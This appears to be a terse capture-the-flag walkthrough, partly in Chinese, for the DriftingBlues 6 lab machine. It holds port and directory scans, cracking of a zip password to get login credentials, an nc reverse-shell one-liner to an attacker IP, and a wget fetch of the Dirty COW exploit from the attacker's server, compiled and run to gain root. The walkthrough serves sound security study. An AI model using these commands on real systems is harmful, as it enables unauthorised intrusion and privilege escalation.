DRIFTINGBLUES：6

<code class="javascript">nmap -sV -sC -p- 192.168.0.104 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-10 02:06 EDTNmap scan report for 192.168.0.104Host is up (0.0019s latency).Not shown: 65534 closed portsPORT   STATE SERVICE VERSION80/tcp open  http    Apache httpd 2.2.22 ((Debian))| http-robots.txt: 1 disallowed entry |_/textpattern/textpattern|_http-server-header: Apache/2.2.22 (Debian)|_http-title: driftingblues</code>

<code class="javascript">User-agent: *Disallow: /textpattern/textpatterndont forget to add .zip extension to your dir-brute;)</code>

<code class="javascript">dirb http://192.168.0.104/ /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -X .zip</code>

<code class="javascript">┌──(yifang㉿yifang)-[~]└─$ dirsearch -u http://192.168.0.104/ -i 200[02:36:29] 200 -   52KB - /db[02:36:30] 200 -  750B  - /index[02:36:30] 200 -  750B  - /index.html[02:36:33] 200 -  110B  - /robots.txt[02:36:35] 200 -   12KB - /textpattern/-----------------------------------------------------┌──(yifang㉿yifang)-[~]└─$ dirsearch -u http://192.168.0.104/textpattern/textpattern/ -i 200[02:45:38] 200 -    0B  - /textpattern/textpattern/config.php[02:45:40] 200 -    5KB - /textpattern/textpattern/include/[02:45:40] 200 -    4KB - /textpattern/textpattern/index.php[02:45:40] 200 -    4KB - /textpattern/textpattern/index.php/login/[02:45:41] 200 -    6KB - /textpattern/textpattern/lib/[02:45:43] 200 -  784B  - /textpattern/textpattern/plugins/[02:45:43] 200 -    2KB - /textpattern/textpattern/publish/[02:45:44] 200 -    3KB - /textpattern/textpattern/setup/[02:45:45] 200 -  776B  - /textpattern/textpattern/tmp/[02:45:46] 200 -    2KB - /textpattern/textpattern/vendors/-----------------------------------------------------┌──(yifang㉿yifang)-[~]└─$ dirsearch -u http://192.168.0.104/textpattern/ -i 200[02:46:59] 200 -   66KB - /textpattern/HISTORY[02:46:59] 200 -   66KB - /textpattern/HISTORY.txt[02:46:59] 200 -   15KB - /textpattern/LICENSE.txt[02:47:00] 200 -   15KB - /textpattern/LICENSE[02:47:00] 200 -    6KB - /textpattern/README[02:47:00] 200 -    6KB - /textpattern/README.txt[02:47:04] 200 -    0B  - /textpattern/css.php[02:47:05] 200 -  944B  - /textpattern/files/[02:47:06] 200 -  746B  - /textpattern/images/[02:47:06] 200 -   12KB - /textpattern/index.php[02:47:10] 200 -    4KB - /textpattern/textpattern/[02:47:10] 200 -  746B  - /textpattern/themes/</code>

<code class="javascript">┌──(yifang㉿yifang)-[~]└─$ zip2john spammer.zip > passwd  #先生成zip的哈希散列ver 2.0 spammer.zip/creds.txt PKZIP Encr: cmplen=27, decmplen=15, crc=B003611D┌──(yifang㉿yifang)-[~]└─$ john passwd --show #注意这里需要加一个showspammer.zip/creds.txt:myspace4:creds.txt:spammer.zip::spammer.zip1 password hash cracked, 0 left┌──(yifang㉿yifang)-[~]└─$ unzip spammer.zip  #进行zip解压Archive:  spammer.zip[spammer.zip] creds.txt password:  extracting: creds.txt               ┌──(yifang㉿yifang)-[~]└─$ cat creds.txt mayer:lionheart---------------------------------账户：mayer密码：lionheart</code>

<code class="javascript">目标主机：nc -e /bin/shell 192.168.0.103 4444kali：nc -lvp 4444</code>

<code class="javascript">kalicp /usr/share/exploitdb/exploits/linux/local/40839.c .python3 -m http.server-----------------------------------------------目标主机:python -c 'import pty; pty.spawn("/bin/bash")'cd /tmpwget http://192.168.0.103:8000/40839.cgcc -pthread 40839.c -o dirty -lcrypt./dirty-----------------重新连接ncshellpython -c 'import pty; pty.spawn("/bin/bash")'su firefartidcat /root/flag.txt</code>